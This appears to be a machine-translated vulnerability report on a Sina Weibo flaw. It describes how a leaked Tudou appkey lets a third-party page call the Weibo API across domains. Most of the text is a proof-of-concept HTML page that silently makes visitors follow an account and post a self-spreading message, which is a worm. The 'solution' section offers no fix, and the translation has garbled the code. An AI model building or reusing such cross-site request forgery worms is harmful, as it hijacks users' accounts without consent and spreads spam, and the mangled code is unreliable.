Vulnerability:
1. You can call the interface with an appkey:
Click the share button of Tudou to view Tudou's appkey: appkey = 2043051649.
Http://v.t.sina.com.cn/share/share.php? Export & appkey = 2043051649 & ralateUid = 1692113870
2. Use this appkey to create a third-party page and call the Weibo interface to automatically submit information across domains. For details, see the code.
3. Share the URL of a third-party page to Weibo to spread the virus.
Access with a test account, demo address: http://weibo.com/1829851507/y8DfIdTWT
Proof of vulnerability:
<Html>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<! -- Automatically add follow -->
<Form action = "http://api.t.sina.com.cn/friendships/create.xml? Source = 2043051649 "method =" post "id =" f "target =" ifr ">
<Input name = "user_id" id = "fuid">
</Form>
<Iframe id = "ifr" name = "ifr"> </iframe>
<! -- Auto-send Weibo -->
<Form action = "http://api.t.sina.com.cn/statuses/update.xml? Source = 2043051649 "method =" post "id =" f2 "target =" ifr2 ">
<Input name = "status" id = "updatemsg" value = "">
<Input name = "type" value = "discuss">
<Input type = "submit">
</Form>
<Iframe id = "ifr2" name = "ifr2"> </iframe>
<Script>
Function update (msg ){
Document. getElementById ('updatemsg '). value = msg;
Document. getElementById ('F2'). submit ();
}
Function follow (uid ){
Document. getElementById ('fuid'). value = uid;
Document. getElementById ('F'). submit ();
}
Update ('White quiet was killed, because the inventory changes into the tragedy of the stars http://www.bkjia.com /? Id = '+ new Date (). getTime (); // Add follow
Follow ("1649172451"); // send Weibo messages automatically
</Script>
</Html>
Solution:
Didn't I disable cookie Access? Why?
Author songlv